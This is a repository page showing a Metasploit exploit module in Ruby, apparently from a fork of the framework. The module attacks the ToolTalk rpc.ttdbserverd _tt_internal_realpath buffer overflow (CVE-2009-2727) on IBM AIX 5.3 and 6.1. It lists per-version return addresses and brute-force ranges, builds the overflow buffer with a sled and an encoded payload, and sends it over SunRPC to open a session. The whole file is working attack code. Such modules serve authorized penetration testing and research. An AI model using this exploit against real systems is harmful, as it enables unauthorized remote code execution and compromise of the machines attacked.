adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
T

280 lines
7.8 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in _tt_internal_realpath
function of the ToolTalk database server (rpc.ttdbserverd).
},
'Author' => [
'Ramon de C Valle',
'Adriano Lima <adriano[at]risesecurity.org>',
],
'Platform' => [ 'aix' ],
'References' => [
[ 'CVE', '2009-2727'],
[ 'OSVDB', '55151' ]
],
'Payload' => {
'BadChars' => "\x00"
},
'Targets' => [
[
'IBM AIX Version 6.1.4',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099430 + 4096,
'Addr1' => 0x2ff1ff50 - 8192,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099430 - 8192 },
'Stop' => { 'Ret' => 0x20099430 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280 + 4096,
'Addr1' => 0x2ff1ffd0 - 8192,
'AIX' => '6.1.3',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280 - 8192 },
'Stop' => { 'Ret' => 0x20099280 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.2',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280 + 4096,
'Addr1' => 0x2ff1ffd0 - 8192,
'AIX' => '6.1.2',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280 - 8192 },
'Stop' => { 'Ret' => 0x20099280 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280 + 4096,
'Addr1' => 0x2ff1ffd0 - 8192,
'AIX' => '6.1.1',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280 - 8192 },
'Stop' => { 'Ret' => 0x20099280 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.0',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280 + 4096,
'Addr1' => 0x2ff1ffd0 - 8192,
'AIX' => '6.1.0',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280 - 8192 },
'Stop' => { 'Ret' => 0x20099280 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0 + 4096,
'Addr1' => 0x2ff1ff14 - 8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0 - 8192 },
'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096bf0 + 4096,
'Addr1' => 0x2ff1ff14 - 8192,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096bf0 - 8192 },
'Stop' => { 'Ret' => 0x20096bf0 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.9',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0 + 4096,
'Addr1' => 0x2ff1ff14 - 8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0 - 8192 },
'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.8',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10 + 4096,
'Addr1' => 0x2ff1ff98 - 8192,
'AIX' => '5.3.8',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10 - 8192 },
'Stop' => { 'Ret' => 0x20096c10 + 8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10 + 4096,
'Addr1' => 0x2ff1ff98 - 8192,
'AIX' => '5.3.7',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10 - 8192 },
'Stop' => { 'Ret' => 0x20096c10 + 8192 },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 6.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 5.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => '2009-06-17',
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SERVICE_RESTARTS ],
'SideEffects' => [ IOC_IN_LOGS ]
}
)
)
end
def brute_exploit(brute_target)
if !@aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status('Trying to exploit rpc.ttdbserverd with address 0x%08x...' % brute_target['Ret'])
begin
sunrpc_create('tcp', 100083, 1)
if target['AIX'] =~ /6\./
buf = 'A'
else
buf = 'AA'
end
buf << [target['Addr1']].pack('N') * (1022 + 8)
buf << [brute_target['Ret']].pack('N') * 32
if target['AIX'] =~ /6\./
buf << 'AAA'
else
buf << 'AA'
end
buf << "\x7f\xff\xfb\x78" * 1920
buf << @aixpayload
buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)
sunrpc_destroy
handler
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end
Reference in New Issue View Git Blame Copy Permalink